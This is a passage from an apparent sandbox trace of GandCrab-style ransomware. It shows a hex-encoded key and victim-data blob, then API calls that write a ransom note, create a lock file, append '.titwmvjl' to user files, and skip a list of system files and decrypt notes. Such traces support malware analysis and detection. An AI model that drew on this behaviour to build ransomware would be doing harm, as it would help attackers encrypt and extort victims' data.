x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.204] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0091.205] CloseHandle (hObject=0x2ac) returned 1 [0091.205] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.205] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.205] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x209)) [0091.205] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.206] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.206] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.206] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock") returned 66 [0091.206] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0091.206] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.206] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\") returned 42 [0091.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*" [0091.207] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x503638 [0091.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.207] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.208] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.208] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0091.208] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0091.208] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock" [0091.208] lstrlenW (lpString=".titwmvjl") returned 9 [0091.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock") returned 66 [0091.208] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.208] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 75 [0091.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a09d2ca4deb61a.lock") returned 66 [0091.208] lstrlenW (lpString=".lock") returned 5 [0091.208] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.208] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0091.208] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.208] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.209] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.209] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0091.209] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0091.209] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini" [0091.209] lstrlenW (lpString=".titwmvjl") returned 9 [0091.209] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.209] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.209] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini.titwmvjl") returned 62 [0091.209] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.209] lstrlenW (lpString=".ini") returned 4 [0091.209] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.209] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0091.209] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0091.209] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.209] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.209] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.209] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0091.209] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.210] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.210] lstrcmpW (lpString1="Favorites.vssx", lpString2=".") returned 1 [0091.210] lstrcmpW (lpString1="Favorites.vssx", lpString2="..") returned 1 [0091.210] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="Favorites.vssx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx" [0091.210] lstrlenW (lpString=".titwmvjl") returned 9 [0091.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.210] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.210] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx.titwmvjl") returned 65 [0091.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.210] lstrlenW (lpString=".vssx") returned 5 [0091.210] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.210] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".vssx ") returned 6 [0091.210] lstrcmpiW (lpString1=".vssx", lpString2=".titwmvjl") returned 1 [0091.210] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.210] lstrcmpiW (lpString1="Favorites.vssx", lpString2="desktop.ini") returned 1 [0091.210] lstrcmpiW (lpString1="Favorites.vssx", lpString2="autorun.inf") returned 1 [0091.210] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ntuser.dat") returned -1 [0091.210] lstrcmpiW (lpString1="Favorites.vssx", lpString2="iconcache.db") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="bootsect.bak") returned 1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="boot.ini") returned 1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ntuser.dat.log") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="thumbs.db") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ntldr") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="NTDETECT.COM") returned -1 [0091.211] lstrcmpiW (lpString1="Favorites.vssx", lpString2="Bootfont.bin") returned 1 [0091.211] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.211] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.211] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0091.211] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0091.211] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt" [0091.211] lstrlenW (lpString=".titwmvjl") returned 9 [0091.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt") returned 62 [0091.211] VirtualAlloc (lpAddress=0x0, dwSize=0xbc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.211] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 71 [0091.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt") returned 62 [0091.211] lstrlenW (lpString=".txt") returned 4 [0091.211] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.212] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0091.212] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0091.212] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt") returned 62 [0091.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\TITWMVJL-DECRYPT.txt") returned 62 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.212] lstrcmpiW 